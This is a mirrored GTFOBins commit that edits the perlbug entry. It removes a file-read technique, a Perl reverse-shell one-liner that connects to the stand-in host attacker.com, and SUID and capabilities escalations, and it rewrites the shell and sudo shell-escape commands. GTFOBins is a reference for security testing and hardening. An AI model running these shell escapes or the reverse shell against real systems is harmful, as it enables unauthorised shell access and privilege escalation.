mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Remove wrong functions
This commit is contained in:
		@@ -1,21 +1,7 @@
 | 
				
			|||||||
---
 | 
					---
 | 
				
			||||||
functions:
 | 
					functions:
 | 
				
			||||||
  shell:
 | 
					  shell:
 | 
				
			||||||
    - code: perlbug -e 'exec "/bin/sh";'
 | 
					    - code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
 | 
				
			||||||
  file-read:
 | 
					 | 
				
			||||||
    - code: |
 | 
					 | 
				
			||||||
        LFILE=file_to_read
 | 
					 | 
				
			||||||
        perlbug -ne print $LFILE
 | 
					 | 
				
			||||||
  reverse-shell:
 | 
					 | 
				
			||||||
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 | 
					 | 
				
			||||||
      code: |
 | 
					 | 
				
			||||||
        export RHOST=attacker.com
 | 
					 | 
				
			||||||
        export RPORT=12345
 | 
					 | 
				
			||||||
        perlbug -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 | 
					 | 
				
			||||||
  suid:
 | 
					 | 
				
			||||||
    - code: ./perlbug -e 'exec "/bin/sh";'
 | 
					 | 
				
			||||||
  sudo:
 | 
					  sudo:
 | 
				
			||||||
    - code: sudo perlbug -e 'exec "/bin/sh";'
 | 
					    - code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
 | 
				
			||||||
  capabilities:
 | 
					 | 
				
			||||||
    - code: ./perlbug -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 | 
					 | 
				
			||||||
---
 | 
					---
 | 
				
			||||||
 
 | 
				
			|||||||
		Reference in New Issue
	
	Block a user